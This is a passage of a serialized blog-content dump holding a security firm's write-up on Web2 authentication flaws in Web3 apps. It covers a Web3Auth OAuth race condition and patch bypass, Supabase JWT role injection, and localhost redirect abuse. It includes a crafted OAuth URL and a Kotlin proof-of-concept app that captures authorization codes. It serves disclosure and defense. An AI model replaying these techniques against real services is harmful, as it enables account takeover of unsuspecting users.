",{"type":24,"tag":188,"props":76136,"children":76139},{"href":76137,"rel":76138},"https://github.com/pcaversaccio/safe-tx-hashes-util",[192],[76140],{"type":30,"value":76141},"validate Safe transaction hashes",{"type":30,"value":76143},". As the space matures, we hope more open source tooling will come to light.",{"type":24,"tag":25200,"props":76145,"children":76147},{"className":76146,"dataFootnotes":7},[25203],[76148,76153],{"type":24,"tag":43,"props":76149,"children":76151},{"className":76150,"id":22269},[25208],[76152],{"type":30,"value":25211},{"type":24,"tag":6246,"props":76154,"children":76155},{},[76156],{"type":24,"tag":2659,"props":76157,"children":76158},{"id":37122},[76159,76161,76169,76171],{"type":30,"value":76160},"The original version of this blog post did not consider a malicious fee-payer. Thanks to ",{"type":24,"tag":188,"props":76162,"children":76166},{"href":76163,"rel":76164,":style":76165},"https://twitter.com/PierreArowana",[192],"color: #B1D0EE; text-decoration: underline;",[76167],{"type":30,"value":76168},"@PierreArowana",{"type":30,"value":76170}," for pointing this out to me. ",{"type":24,"tag":188,"props":76172,"children":76174},{"href":37150,"ariaLabel":25313,"className":76173,"dataFootnoteBackref":7},[25315],[76175],{"type":30,"value":25318},{"type":24,"tag":9672,"props":76177,"children":76178},{},[76179],{"type":30,"value":9676},{"title":7,"searchDepth":320,"depth":320,"links":76181},[76182,76186,76187,76188],{"id":74378,"depth":320,"text":74381,"children":76183},[76184,76185],{"id":74389,"depth":335,"text":74392},{"id":74668,"depth":335,"text":74671},{"id":75389,"depth":320,"text":75392},{"id":76121,"depth":320,"text":76124},{"id":22269,"depth":320,"text":25211},"content:blog:2025-02-22-multisig-security.md","blog/2025-02-22-multisig-security.md","blog/2025-02-22-multisig-security",{"_path":76193,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":76194,"description":76195,"date":76196,"author":76197,"image":76198,"isFeatured":16,"onBlogPage":16,"tags":76200,"body":76201,"_type":9700,"_id":77898,"_source":9702,"_file":77899,"_stem":77900,"_extension":9705},"/blog/2025-03-07-subverting-web2-authentication-in-web3","Subverting Web2 Authentication in Web3","Web3 authentication uses cryptographic signatures and wallets, but Web2 auth integrations can introduce hidden risks. We explore vulnerabilities like OAuth logic exploits, Supabase misconfigurations, and OAuth abuse in localhost setups.","2025-03-07",[37957,37956],{"src":76199},"/posts/web2-in-web3/title.jpg",[38893],{"type":21,"children":76202,"toc":77880},[76203,76208,76213,76218,76244,76250,76255,76261,76282,76288,76293,76300,76313,76343,76349,76393,76400,76406,76439,76460,76468,76487,76494,76499,76505,76510,76515,76540,76545,76551,76557,76578,76584,76611,76639,76646,76651,76656,77001,77005,77027,77033,77054,77068,77081,77086,77102,77107,77835,77840,77845,77850,77862,77866,77871,77876],{"type":24,"tag":32,"props":76204,"children":76205},{},[76206],{"type":30,"value":76207},"Authentication serves as a cornerstone of secure interactions in Web3, enabling access control, user identity verification, and transaction integrity. Unlike traditional Web2 systems, which often rely on centralized databases and password-based mechanisms, Web3 systems adopt decentralized identifiers (DIDs), cryptographic signatures, and wallet-based authentication. However, there are many applications that still use Web2-based authentication providers to improve the user experience.",{"type":24,"tag":32,"props":76209,"children":76210},{},[76211],{"type":30,"value":76212},"In our research, we focused on Web3 applications that rely on Web2-based authentication methods. Specifically, we analyzed the authentication flows of these applications and identified a lesser-known class of vulnerabilities.",{"type":24,"tag":32,"props":76214,"children":76215},{},[76216],{"type":30,"value":76217},"In this article, we will discuss three cases we discovered:",{"type":24,"tag":6246,"props":76219,"children":76220},{},[76221,76226,76239],{"type":24,"tag":2659,"props":76222,"children":76223},{},[76224],{"type":30,"value":76225},"OAuth Logic Vulnerability on an Authentication Provider",{"type":24,"tag":2659,"props":76227,"children":76228},{},[76229,76231,76237],{"type":30,"value":76230},"Supabase ",{"type":24,"tag":145,"props":76232,"children":76234},{"className":76233},[],[76235],{"type":30,"value":76236},"user_metadata",{"type":30,"value":76238}," misconfiguration",{"type":24,"tag":2659,"props":76240,"children":76241},{},[76242],{"type":30,"value":76243},"OAuth abuse in localhost development environment",{"type":24,"tag":43,"props":76245,"children":76247},{"id":76246},"abusing-oauth-authentication-logic",[76248],{"type":30,"value":76249},"Abusing OAuth Authentication Logic",{"type":24,"tag":32,"props":76251,"children":76252},{},[76253],{"type":30,"value":76254},"During our research, we initially identified some bugs in applications. However, these were mostly simple and well-known issues, so we decided to focus on vulnerabilities within authentication providers themselves.",{"type":24,"tag":80,"props":76256,"children":76258},{"id":76257},"web3auth-introduction",[76259],{"type":30,"value":76260},"Web3Auth Introduction",{"type":24,"tag":32,"props":76262,"children":76263},{},[76264,76271,76273,76280],{"type":24,"tag":188,"props":76265,"children":76268},{"href":76266,"rel":76267},"https://web3auth.io/",[192],[76269],{"type":30,"value":76270},"Web3Auth",{"type":30,"value":76272}," is a tool designed to simplify the login process for Web3 applications, eliminating the need for users to manage complex wallet setups or memorize lengthy passwords. One of its products, Web3Auth PnP (Plug and Play), supports ",{"type":24,"tag":188,"props":76274,"children":76277},{"href":76275,"rel":76276},"https://oauth.net/2/",[192],[76278],{"type":30,"value":76279},"OAuth2",{"type":30,"value":76281}," authentication using Google. The product employs a sophisticated authentication flow and infrastructure to maintain seamless integration with dApps.",{"type":24,"tag":80,"props":76283,"children":76285},{"id":76284},"web3auth-authentication-flow",[76286],{"type":30,"value":76287},"Web3Auth Authentication flow",{"type":24,"tag":32,"props":76289,"children":76290},{},[76291],{"type":30,"value":76292},"The Web3Auth PnP authentication flow involves a web session server that stores authentication parameters and configurations. Below is a diagram illustrating how the authentication process works:",{"type":24,"tag":32,"props":76294,"children":76295},{},[76296],{"type":24,"tag":177,"props":76297,"children":76299},{"alt":179,"src":76298},"/posts/web2-in-web3/auth-flow.png",[],{"type":24,"tag":32,"props":76301,"children":76302},{},[76303,76305,76311],{"type":30,"value":76304},"After the final redirect back to the dApp, the application can use the secret token to authenticate with the service identified by the ",{"type":24,"tag":145,"props":76306,"children":76308},{"className":76307},[],[76309],{"type":30,"value":76310},"client_id",{"type":30,"value":76312},". This design ensures that you cannot use the token to authenticate against any unauthorized application.",{"type":24,"tag":32,"props":76314,"children":76315},{},[76316,76318,76324,76326,76332,76334,76341],{"type":30,"value":76317},"Additionally, it is important to note that each dApp has a whitelist of redirect URLs. The ",{"type":24,"tag":145,"props":76319,"children":76321},{"className":76320},[],[76322],{"type":30,"value":76323},"/start",{"type":30,"value":76325}," validates the ",{"type":24,"tag":145,"props":76327,"children":76329},{"className":76328},[],[76330],{"type":30,"value":76331},"redirect_url",{"type":30,"value":76333}," against the configured ",{"type":24,"tag":188,"props":76335,"children":76338},{"href":76336,"rel":76337},"https://web3auth.io/docs/dashboard-setup/whitelisting",[192],[76339],{"type":30,"value":76340},"whitelist",{"type":30,"value":76342}," to ensure it matches one of the allowed URLs.",{"type":24,"tag":80,"props":76344,"children":76346},{"id":76345},"in-transit-cryptography",[76347],{"type":30,"value":76348},"In-transit Cryptography",{"type":24,"tag":32,"props":76350,"children":76351},{},[76352,76354,76361,76363,76369,76371,76377,76379,76384,76386,76391],{"type":30,"value":76353},"The session server employs cryptography to securely send and receive authentication parameters. The ",{"type":24,"tag":188,"props":76355,"children":76358},{"href":76356,"rel":76357},"https://en.wikipedia.org/wiki/Key_(cryptography)",[192],[76359],{"type":30,"value":76360},"cryptographic key",{"type":30,"value":76362}," is derived from the ",{"type":24,"tag":145,"props":76364,"children":76366},{"className":76365},[],[76367],{"type":30,"value":76368},"sessionId",{"type":30,"value":76370}," sent in the ",{"type":24,"tag":145,"props":76372,"children":76374},{"className":76373},[],[76375],{"type":30,"value":76376},"GET",{"type":30,"value":76378}," parameter to the ",{"type":24,"tag":145,"props":76380,"children":76382},{"className":76381},[],[76383],{"type":30,"value":76323},{"type":30,"value":76385},". Since the ",{"type":24,"tag":145,"props":76387,"children":76389},{"className":76388},[],[76390],{"type":30,"value":76368},{"type":30,"value":76392}," can be controlled, it allows us to send and receive data from the session server.",{"type":24,"tag":32,"props":76394,"children":76395},{},[76396],{"type":24,"tag":177,"props":76397,"children":76399},{"alt":179,"src":76398},"/posts/web2-in-web3/image-2.png",[],{"type":24,"tag":80,"props":76401,"children":76403},{"id":76402},"race-condition",[76404],{"type":30,"value":76405},"Race Condition",{"type":24,"tag":32,"props":76407,"children":76408},{},[76409,76411,76416,76418,76424,76426,76431,76433,76438],{"type":30,"value":76410},"As shown in the diagram, the configuration data from the session server is validated only during the ",{"type":24,"tag":145,"props":76412,"children":76414},{"className":76413},[],[76415],{"type":30,"value":76323},{"type":30,"value":76417}," and later used in the ",{"type":24,"tag":145,"props":76419,"children":76421},{"className":76420},[],[76422],{"type":30,"value":76423},"/end",{"type":30,"value":76425}," enpoint. This introduces a potential race condition that can be exploited if an attacker manages to modify the parameters after validation (",{"type":24,"tag":145,"props":76427,"children":76429},{"className":76428},[],[76430],{"type":30,"value":76323},{"type":30,"value":76432},") but before use (",{"type":24,"tag":145,"props":76434,"children":76436},{"className":76435},[],[76437],{"type":30,"value":76423},{"type":30,"value":27511},{"type":24,"tag":32,"props":76440,"children":76441},{},[76442,76444,76451,76453,76458],{"type":30,"value":76443},"To exploit this ",{"type":24,"tag":188,"props":76445,"children":76448},{"href":76446,"rel":76447},"https://portswigger.net/web-security/race-conditions",[192],[76449],{"type":30,"value":76450},"race condition",{"type":30,"value":76452},", an attacker-controlled website can initiate the authentication flow normally. Then, it can send another request to the session server with the same ",{"type":24,"tag":145,"props":76454,"children":76456},{"className":76455},[],[76457],{"type":30,"value":76368},{"type":30,"value":76459}," but with modified malicious parameters.",{"type":24,"tag":32,"props":76461,"children":76462},{},[76463],{"type":24,"tag":60,"props":76464,"children":76465},{},[76466],{"type":30,"value":76467},"What can be modified to achieve something impactful?",{"type":24,"tag":32,"props":76469,"children":76470},{},[76471,76473,76479,76481,76486],{"type":30,"value":76472},"The answer is quite simple if you understand how OAuth works. The attacker can simply change the ",{"type":24,"tag":145,"props":76474,"children":76476},{"className":76475},[],[76477],{"type":30,"value":76478},"redirect_uri",{"type":30,"value":76480}," parameter to point to their own website and leak the secret token from the query string. With the secret token, they can authenticate against the application defined by ",{"type":24,"tag":145,"props":76482,"children":76484},{"className":76483},[],[76485],{"type":30,"value":76310},{"type":30,"value":206},{"type":24,"tag":32,"props":76488,"children":76489},{},[76490],{"type":24,"tag":177,"props":76491,"children":76493},{"alt":179,"src":76492},"/posts/web2-in-web3/image-3.png",[],{"type":24,"tag":32,"props":76495,"children":76496},{},[76497],{"type":30,"value":76498},"Using this exploit, we were able to create a website capable of taking over the accounts of victims who followed the standard OAuth flow.",{"type":24,"tag":80,"props":76500,"children":76502},{"id":76501},"patch-bypass",[76503],{"type":30,"value":76504},"Patch & Bypass",{"type":24,"tag":32,"props":76506,"children":76507},{},[76508],{"type":30,"value":76509},"The vulnerability was reported and remediated on the same day (super quickly!). However, we found that the fix was not backported to older versions.",{"type":24,"tag":32,"props":76511,"children":76512},{},[76513],{"type":30,"value":76514},"To bypass the fix we were able to change the version in the URL:",{"type":24,"tag":2655,"props":76516,"children":76517},{},[76518,76529],{"type":24,"tag":2659,"props":76519,"children":76520},{},[76521,76527],{"type":24,"tag":145,"props":76522,"children":76524},{"className":76523},[],[76525],{"type":30,"value":76526},"https://auth.web3auth.io/v8/start",{"type":30,"value":76528}," (latest version)",{"type":24,"tag":2659,"props":76530,"children":76531},{},[76532,76538],{"type":24,"tag":145,"props":76533,"children":76535},{"className":76534},[],[76536],{"type":30,"value":76537},"https://auth.web3auth.io/v6/start",{"type":30,"value":76539}," (bypass)",{"type":24,"tag":32,"props":76541,"children":76542},{},[76543],{"type":30,"value":76544},"We reported this issue, and it was addressed just as quickly!",{"type":24,"tag":43,"props":76546,"children":76548},{"id":76547},"supabase-metadata-manipulation",[76549],{"type":30,"value":76550},"Supabase metadata manipulation",{"type":24,"tag":80,"props":76552,"children":76554},{"id":76553},"supabase-authentication-flow",[76555],{"type":30,"value":76556},"Supabase Authentication flow",{"type":24,"tag":32,"props":76558,"children":76559},{},[76560,76567,76569,76576],{"type":24,"tag":188,"props":76561,"children":76564},{"href":76562,"rel":76563},"https://supabase.com/docs/guides/auth",[192],[76565],{"type":30,"value":76566},"Supabase",{"type":30,"value":76568}," is a Backend-as-a-Service (BaaS) platform that provides authentication, database, and real-time APIs. The authentication process begins when a user registers or logs in. Supabase generates a ",{"type":24,"tag":188,"props":76570,"children":76573},{"href":76571,"rel":76572},"https://jwt.io/",[192],[76574],{"type":30,"value":76575},"JWT",{"type":30,"value":76577}," for the authenticated user, embedding claims such as the user ID, roles, and additional metadata (either user-provided or system-generated). This token is then returned to the client and used for subsequent API requests, during which the server validates the JWT to confirm the user’s identity and permissions.",{"type":24,"tag":80,"props":76579,"children":76581},{"id":76580},"jwt-verification",[76582],{"type":30,"value":76583},"JWT verification",{"type":24,"tag":32,"props":76585,"children":76586},{},[76587,76589,76594,76595,76601,76603,76609],{"type":30,"value":76588},"In one of our clients' systems, we discovered a vulnerability that allowed the inclusion of custom fields, such as ",{"type":24,"tag":145,"props":76590,"children":76592},{"className":76591},[],[76593],{"type":30,"value":76236},{"type":30,"value":2378},{"type":24,"tag":145,"props":76596,"children":76598},{"className":76597},[],[76599],{"type":30,"value":76600},"identity_data",{"type":30,"value":76602},", in a signup request by manipulating the input inside the ",{"type":24,"tag":145,"props":76604,"children":76606},{"className":76605},[],[76607],{"type":30,"value":76608},"\"data\": {}",{"type":30,"value":76610}," structure. These fields were then directly reflected in the issued JWT without validation.",{"type":24,"tag":32,"props":76612,"children":76613},{},[76614,76616,76622,76623,76629,76631,76637],{"type":30,"value":76615},"For example, an attacker could send a signup request with arbitrary data, such as ",{"type":24,"tag":145,"props":76617,"children":76619},{"className":76618},[],[76620],{"type":30,"value":76621},"\"role\": \"admin\"",{"type":30,"value":152},{"type":24,"tag":145,"props":76624,"children":76626},{"className":76625},[],[76627],{"type":30,"value":76628},"\"email_verified\": true",{"type":30,"value":76630},", which would subsequently be included in the JWT claims. Additionally, it was possible to insert arbitrary fields beyond typical inputs, such as ",{"type":24,"tag":145,"props":76632,"children":76634},{"className":76633},[],[76635],{"type":30,"value":76636},"\"test\": \"test\"",{"type":30,"value":76638},", enabling us to inject arbitrary data into the final JWT token.",{"type":24,"tag":32,"props":76640,"children":76641},{},[76642],{"type":24,"tag":177,"props":76643,"children":76645},{"alt":179,"src":76644},"/posts/web2-in-web3/image-4.png",[],{"type":24,"tag":32,"props":76647,"children":76648},{},[76649],{"type":30,"value":76650},"In this example we are controlling the \"role\" field within the user metadata. If the application manage roles using the metadata, it would be vulnerable to a privilege escalation since anyone could inject any role there.",{"type":24,"tag":32,"props":76652,"children":76653},{},[76654],{"type":30,"value":76655},"The attacker could subsequently log in on the main platform, retrieve the token, and verify that their injected parameters persist in the JWT by submitting it to a verification endpoint. This happens because a function parseSupaBase was parsing and verifying everything generated by the JWT supabase token.",{"type":24,"tag":291,"props":76657,"children":76659},{"className":38119,"code":76658,"language":38121,"meta":7,"style":7},"function parseSupaBase(token) {\n try {\n const [header, payload, signature] = token.split('.');\n const decodedHeader = JSON.parse(atob(header));\n const decodedPayload = JSON.parse(atob(payload));\n return { header: decodedHeader, payload: decodedPayload, signature };\n } catch (error) {\n console.error('Error parsing token:', error);\n return null;\n }\n}\n",[76660],{"type":24,"tag":145,"props":76661,"children":76662},{"__ignoreMap":7},[76663,76688,76700,76769,76818,76866,76911,76934,76971,76987,76994],{"type":24,"tag":301,"props":76664,"children":76665},{"class":303,"line":304},[76666,76670,76675,76679,76684],{"type":24,"tag":301,"props":76667,"children":76668},{"style":348},[76669],{"type":30,"value":3205},{"type":24,"tag":301,"props":76671,"children":76672},{"style":314},[76673],{"type":30,"value":76674}," parseSupaBase",{"type":24,"tag":301,"props":76676,"children":76677},{"style":359},[76678],{"type":30,"value":362},{"type":24,"tag":301,"props":76680,"children":76681},{"style":369},[76682],{"type":30,"value":76683},"token",{"type":24,"tag":301,"props":76685,"children":76686},{"style":359},[76687],{"type":30,"value":398},{"type":24,"tag":301,"props":76689,"children":76690},{"class":303,"line":320},[76691,76696],{"type":24,"tag":301,"props":76692,"children":76693},{"style":308},[76694],{"type":30,"value":76695}," try",{"type":24,"tag":301,"props":76697,"children":76698},{"style":359},[76699],{"type":30,"value":3035},{"type":24,"tag":301,"props":76701,"children":76702},{"class":303,"line":335},[76703,76707,76711,76716,76720,76725,76729,76734,76738,76742,76747,76751,76756,76760,76765],{"type":24,"tag":301,"props":76704,"children":76705},{"style":348},[76706],{"type":30,"value":39651},{"type":24,"tag":301,"props":76708,"children":76709},{"style":359},[76710],{"type":30,"value":29800},{"type":24,"tag":301,"props":76712,"children":76713},{"style":369},[76714],{"type":30,"value":76715},"header",{"type":24,"tag":301,"props":76717,"children":76718},{"style":359},[76719],{"type":30,"value":377},{"type":24,"tag":301,"props":76721,"children":76722},{"style":369},[76723],{"type":30,"value":76724},"payload",{"type":24,"tag":301,"props":76726,"children":76727},{"style":359},[76728],{"type":30,"value":377},{"type":24,"tag":301,"props":76730,"children":76731},{"style":369},[76732],{"type":30,"value":76733},"signature",{"type":24,"tag":301,"props":76735,"children":76736},{"style":359},[76737],{"type":30,"value":1046},{"type":24,"tag":301,"props":76739,"children":76740},{"style":385},[76741],{"type":30,"value":523},{"type":24,"tag":301,"props":76743,"children":76744},{"style":369},[76745],{"type":30,"value":76746}," token",{"type":24,"tag":301,"props":76748,"children":76749},{"style":359},[76750],{"type":30,"value":206},{"type":24,"tag":301,"props":76752,"children":76753},{"style":314},[76754],{"type":30,"value":76755},"split",{"type":24,"tag":301,"props":76757,"children":76758},{"style":359},[76759],{"type":30,"value":362},{"type":24,"tag":301,"props":76761,"children":76762},{"style":329},[76763],{"type":30,"value":76764},"'.'",{"type":24,"tag":301,"props":76766,"children":76767},{"style":359},[76768],{"type":30,"value":589},{"type":24,"tag":301,"props":76770,"children":76771},{"class":303,"line":344},[76772,76776,76781,76785,76789,76793,76797,76801,76806,76810,76814],{"type":24,"tag":301,"props":76773,"children":76774},{"style":348},[76775],{"type":30,"value":39651},{"type":24,"tag":301,"props":76777,"children":76778},{"style":369},[76779],{"type":30,"value":76780}," decodedHeader",{"type":24,"tag":301,"props":76782,"children":76783},{"style":385},[76784],{"type":30,"value":2537},{"type":24,"tag":301,"props":76786,"children":76787},{"style":369},[76788],{"type":30,"value":44267},{"type":24,"tag":301,"props":76790,"children":76791},{"style":359},[76792],{"type":30,"value":206},{"type":24,"tag":301,"props":76794,"children":76795},{"style":314},[76796],{"type":30,"value":45949},{"type":24,"tag":301,"props":76798,"children":76799},{"style":359},[76800],{"type":30,"value":362},{"type":24,"tag":301,"props":76802,"children":76803},{"style":314},[76804],{"type":30,"value":76805},"atob",{"type":24,"tag":301,"props":76807,"children":76808},{"style":359},[76809],{"type":30,"value":362},{"type":24,"tag":301,"props":76811,"children":76812},{"style":369},[76813],{"type":30,"value":76715},{"type":24,"tag":301,"props":76815,"children":76816},{"style":359},[76817],{"type":30,"value":3416},{"type":24,"tag":301,"props":76819,"children":76820},{"class":303,"line":401},[76821,76825,76830,76834,76838,76842,76846,76850,76854,76858,76862],{"type":24,"tag":301,"props":76822,"children":76823},{"style":348},[76824],{"type":30,"value":39651},{"type":24,"tag":301,"props":76826,"children":76827},{"style":369},[76828],{"type":30,"value":76829}," decodedPayload",{"type":24,"tag":301,"props":76831,"children":76832},{"style":385},[76833],{"type":30,"value":2537},{"type":24,"tag":301,"props":76835,"children":76836},{"style":369},[76837],{"type":30,"value":44267},{"type":24,"tag":301,"props":76839,"children":76840},{"style":359},[76841],{"type":30,"value":206},{"type":24,"tag":301,"props":76843,"children":76844},{"style":314},[76845],{"type":30,"value":45949},{"type":24,"tag":301,"props":76847,"children":76848},{"style":359},[76849],{"type":30,"value":362},{"type":24,"tag":301,"props":76851,"children":76852},{"style":314},[76853],{"type":30,"value":76805},{"type":24,"tag":301,"props":76855,"children":76856},{"style":359},[76857],{"type":30,"value":362},{"type":24,"tag":301,"props":76859,"children":76860},{"style":369},[76861],{"type":30,"value":76724},{"type":24,"tag":301,"props":76863,"children":76864},{"style":359},[76865],{"type":30,"value":3416},{"type":24,"tag":301,"props":76867,"children":76868},{"class":303,"line":415},[76869,76873,76877,76882,76886,76890,76895,76899,76903,76907],{"type":24,"tag":301,"props":76870,"children":76871},{"style":308},[76872],{"type":30,"value":482},{"type":24,"tag":301,"props":76874,"children":76875},{"style":359},[76876],{"type":30,"value":16392},{"type":24,"tag":301,"props":76878,"children":76879},{"style":369},[76880],{"type":30,"value":76881},"header:",{"type":24,"tag":301,"props":76883,"children":76884},{"style":369},[76885],{"type":30,"value":76780},{"type":24,"tag":301,"props":76887,"children":76888},{"style":359},[76889],{"type":30,"value":377},{"type":24,"tag":301,"props":76891,"children":76892},{"style":369},[76893],{"type":30,"value":76894},"payload:",{"type":24,"tag":301,"props":76896,"children":76897},{"style":369},[76898],{"type":30,"value":76829},{"type":24,"tag":301,"props":76900,"children":76901},{"style":359},[76902],{"type":30,"value":377},{"type":24,"tag":301,"props":76904,"children":76905},{"style":369},[76906],{"type":30,"value":76733},{"type":24,"tag":301,"props":76908,"children":76909},{"style":359},[76910],{"type":30,"value":25077},{"type":24,"tag":301,"props":76912,"children":76913},{"class":303,"line":439},[76914,76918,76922,76926,76930],{"type":24,"tag":301,"props":76915,"children":76916},{"style":359},[76917],{"type":30,"value":22565},{"type":24,"tag":301,"props":76919,"children":76920},{"style":308},[76921],{"type":30,"value":55146},{"type":24,"tag":301,"props":76923,"children":76924},{"style":359},[76925],{"type":30,"value":873},{"type":24,"tag":301,"props":76927,"children":76928},{"style":369},[76929],{"type":30,"value":21654},{"type":24,"tag":301,"props":76931,"children":76932},{"style":359},[76933],{"type":30,"value":398},{"type":24,"tag":301,"props":76935,"children":76936},{"class":303,"line":447},[76937,76942,76946,76950,76954,76959,76963,76967],{"type":24,"tag":301,"props":76938,"children":76939},{"style":369},[76940],{"type":30,"value":76941}," console",{"type":24,"tag":301,"props":76943,"children":76944},{"style":359},[76945],{"type":30,"value":206},{"type":24,"tag":301,"props":76947,"children":76948},{"style":314},[76949],{"type":30,"value":21654},{"type":24,"tag":301,"props":76951,"children":76952},{"style":359},[76953],{"type":30,"value":362},{"type":24,"tag":301,"props":76955,"children":76956},{"style":329},[76957],{"type":30,"value":76958},"'Error parsing token:'",{"type":24,"tag":301,"props":76960,"children":76961},{"style":359},[76962],{"type":30,"value":377},{"type":24,"tag":301,"props":76964,"children":76965},{"style":369},[76966],{"type":30,"value":21654},{"type":24,"tag":301,"props":76968,"children":76969},{"style":359},[76970],{"type":30,"value":589},{"type":24,"tag":301,"props":76972,"children":76973},{"class":303,"line":476},[76974,76978,76983],{"type":24,"tag":301,"props":76975,"children":76976},{"style":308},[76977],{"type":30,"value":482},{"type":24,"tag":301,"props":76979,"children":76980},{"style":348},[76981],{"type":30,"value":76982}," null",{"type":24,"tag":301,"props":76984,"children":76985},{"style":359},[76986],{"type":30,"value":492},{"type":24,"tag":301,"props":76988,"children":76989},{"class":303,"line":495},[76990],{"type":24,"tag":301,"props":76991,"children":76992},{"style":359},[76993],{"type":30,"value":501},{"type":24,"tag":301,"props":76995,"children":76996},{"class":303,"line":504},[76997],{"type":24,"tag":301,"props":76998,"children":76999},{"style":359},[77000],{"type":30,"value":698},{"type":24,"tag":80,"props":77002,"children":77003},{"id":47069},[77004],{"type":30,"value":47072},{"type":24,"tag":32,"props":77006,"children":77007},{},[77008,77010,77017,77019,77025],{"type":30,"value":77009},"Developers should avoid trusting input from their Supabase custom domain. ",{"type":24,"tag":188,"props":77011,"children":77014},{"href":77012,"rel":77013},"https://supabase.com/docs/guides/database/postgres/row-level-security",[192],[77015],{"type":30,"value":77016},"Row-Level Security",{"type":30,"value":77018}," (RLS) on Supabase should be enforced, plus important and private fields should be defined in ",{"type":24,"tag":145,"props":77020,"children":77022},{"className":77021},[],[77023],{"type":30,"value":77024},"app_metadata",{"type":30,"value":77026},". These fields must be strictly validated at every step of their creation and update processes.",{"type":24,"tag":43,"props":77028,"children":77030},{"id":77029},"oauth-in-development-environments",[77031],{"type":30,"value":77032},"OAuth in development environments",{"type":24,"tag":32,"props":77034,"children":77035},{},[77036,77038,77045,77047,77052],{"type":30,"value":77037},"After watching a ",{"type":24,"tag":188,"props":77039,"children":77042},{"href":77040,"rel":77041},"https://docs.google.com/presentation/d/1571_ZSOtfVat9u63zfn1ugTPZRN7pQsFIblcxci3czM/edit",[192],[77043],{"type":30,"value":77044},"talk",{"type":30,"value":77046}," by Luan Herrera on exploiting the logic of desktop apps that use OAuth for authentication (specifically using a localhost server), we noticed that many of our customers also permitted localhost within the ",{"type":24,"tag":145,"props":77048,"children":77050},{"className":77049},[],[77051],{"type":30,"value":76478},{"type":30,"value":77053}," parameter during the OAuth flow.",{"type":24,"tag":32,"props":77055,"children":77056},{},[77057,77059,77066],{"type":30,"value":77058},"Herrera's research highlights that if localhost is allowed as a redirect URI, it is generally not exploitable in a desktop environment because impersonating localhost without ",{"type":24,"tag":188,"props":77060,"children":77063},{"href":77061,"rel":77062},"https://www.cloudflare.com/learning/security/what-is-remote-code-execution/",[192],[77064],{"type":30,"value":77065},"Remote Code Execution",{"type":30,"value":77067}," (RCE) is impossible. However, the scenario changes in a mobile environment, where it is feasible to open a localhost web server using a malicious app, making exploitation possible.",{"type":24,"tag":32,"props":77069,"children":77070},{},[77071,77073,77079],{"type":30,"value":77072},"In one of our client's implementations, we identified that ",{"type":24,"tag":145,"props":77074,"children":77076},{"className":77075},[],[77077],{"type":30,"value":77078},"localhost:3000",{"type":30,"value":77080}," was permitted. The exploitation method is the same as demonstrated in Herrera's talk. However, we observed that localhost servers are frequently used and whitelisted by developers, not only for desktop applications but also for testing and development environments.",{"type":24,"tag":32,"props":77082,"children":77083},{},[77084],{"type":30,"value":77085},"For the exploitation, the final Google OAuth URL was constructed as follows:",{"type":24,"tag":291,"props":77087,"children":77091},{"className":77088,"code":77089,"language":77090,"meta":7,"style":7},"language-url shiki shiki-themes slack-dark","https://accounts.google.com/o/oauth2/v2/auth?client_id=redacted&scope=openid%20email%20profile&response_type=code&redirect_uri=http%3A%2F%2Flocalhost%3A3000%2Fapi%2Fauth%2Fcallback%2Fgoogle&prompt=none&access_type=offline&state=2UTJ8naHVglSQQupa1jw1lugsaZr8f5M9hxZp7bxISM&code_challenge=e6_Onj804xizwJzVT5Pf8luKPbtLV-EJssR7I58UQp8&code_challenge_method=S256&service=lso&o2v=2&ddm=1&flowName=GeneralOAuthFlow\n","url",[77092],{"type":24,"tag":145,"props":77093,"children":77094},{"__ignoreMap":7},[77095],{"type":24,"tag":301,"props":77096,"children":77097},{"class":303,"line":304},[77098],{"type":24,"tag":301,"props":77099,"children":77100},{},[77101],{"type":30,"value":77089},{"type":24,"tag":32,"props":77103,"children":77104},{},[77105],{"type":30,"value":77106},"Since there was no public exploit, we also created a proof of concept demonstrating how a malicious APK can be created to steal the OAuth token simply by opening the malicious app. This occurs without any user interaction and results in account takeover.",{"type":24,"tag":291,"props":77108,"children":77112},{"className":77109,"code":77110,"language":77111,"meta":7,"style":7},"language-kotlin shiki shiki-themes slack-dark","class MainActivity : AppCompatActivity() {\n\n override fun onCreate(savedInstanceState: Bundle?) {\n super.onCreate(savedInstanceState)\n\n // Start the Ktor web server\n CoroutineScope(Dispatchers.IO).launch {\n try {\n startWebServer()\n Log.d(\"WebServer\", \"Server started on http://localhost:3000\")\n } catch (e: Exception) {\n Log.e(\"WebServer\", \"Error starting server: ${e.message}\", e)\n }\n }\n\n // Open the Google OAuth page\n val googleOAuthUrl = \"https://accounts.google.com/o/oauth2/v2/auth?client_id=redacted&scope=openid%20email%20profile&response_type=code&redirect_uri=http%3A%2F%2Flocalhost%3A3000%2Fapi%2Fauth%2Fcallback%2Fgoogle&prompt=none&access_type=offline&state=2UTJ8naHVglSQQupa1jw1lugsaZr8f5M9hxZp7bxISM&code_challenge=e6_Onj804xizwJzVT5Pf8luKPbtLV-EJssR7I58UQp8&code_challenge_method=S256&service=lso&o2v=2&ddm=1&flowName=GeneralOAuthFlow\"\n val browserIntent = Intent(Intent.ACTION_VIEW, Uri.parse(googleOAuthUrl))\n startActivity(browserIntent)\n }\n\n private fun startWebServer() {\n embeddedServer(CIO, port = 3000) {\n routing {\n get(\"{...}\") {\n call.respondHtml {\n head {\n meta(charset = \"UTF-8\")\n meta(name = \"viewport\", content = \"width=device-width, initial-scale=1.0\")\n title(\"OAuth Redirect\")\n }\n body {\n h1 { +\"Google OAuth Redirect\" }\n script {\n +\"document.body.innerText = location.search;\"\n }\n }\n }\n }\n }\n }.start(wait = true)\n }\n}\n","kotlin",[77113],{"type":24,"tag":145,"props":77114,"children":77115},{"__ignoreMap":7},[77116,77143,77150,77182,77204,77211,77219,77241,77253,77265,77300,77326,77376,77383,77390,77397,77405,77427,77462,77475,77482,77489,77510,77536,77548,77569,77586,77598,77624,77663,77684,77692,77704,77729,77741,77754,77762,77769,77777,77784,77791,77821,77828],{"type":24,"tag":301,"props":77117,"children":77118},{"class":303,"line":304},[77119,77124,77129,77134,77139],{"type":24,"tag":301,"props":77120,"children":77121},{"style":348},[77122],{"type":30,"value":77123},"class",{"type":24,"tag":301,"props":77125,"children":77126},{"style":10246},[77127],{"type":30,"value":77128}," MainActivity",{"type":24,"tag":301,"props":77130,"children":77131},{"style":359},[77132],{"type":30,"value":77133}," : 